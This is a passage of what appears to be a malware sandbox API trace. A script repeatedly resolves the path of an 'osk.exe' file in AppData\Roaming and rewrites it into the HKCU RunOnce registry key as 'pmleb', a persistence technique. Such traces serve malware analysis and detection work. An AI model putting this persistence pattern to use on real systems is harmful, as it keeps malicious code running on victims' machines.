[0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.032] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0092.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.032] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0092.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.033] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0092.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.033] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.033] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.033] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.034] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.034] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.034] RegCloseKey (hKey=0x280) returned 0x0 [0092.034] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.035] SetTimer (hWnd=0x20280, nIDEvent=0x21e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e4 [0092.035] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.046] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.046] KillTimer (hWnd=0x20280, uIDEvent=0x21e4) returned 1 [0092.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.046] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.047] IUnknown:Release (This=0x787518) returned 0x1 [0092.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.047] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.047] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.048] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0092.048] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.048] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0092.048] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.052] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0092.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.052] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.052] IUnknown:Release (This=0x7a9740) 
returned 0x1 [0092.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.053] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.053] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.053] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.053] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.053] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.053] RegCloseKey (hKey=0x280) returned 0x0 [0092.054] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.054] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.054] SetTimer (hWnd=0x20280, nIDEvent=0x21e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e5 [0092.054] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.062] KillTimer (hWnd=0x20280, uIDEvent=0x21e5) returned 1 [0092.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.062] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.062] IUnknown:Release (This=0x787518) returned 0x1 [0092.062] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.062] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.063] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.063] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.063] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0092.063] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.063] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0092.064] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.064] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0092.065] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.065] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.065] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.065] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.065] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.065] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.066] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.066] RegCloseKey (hKey=0x280) returned 0x0 [0092.066] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.066] SetTimer (hWnd=0x20280, nIDEvent=0x21e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e6 [0092.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.077] KillTimer (hWnd=0x20280, uIDEvent=0x21e6) returned 1 [0092.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.077] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.077] IUnknown:Release (This=0x787518) returned 0x1 [0092.078] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.078] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.078] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.078] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.079] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0092.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, 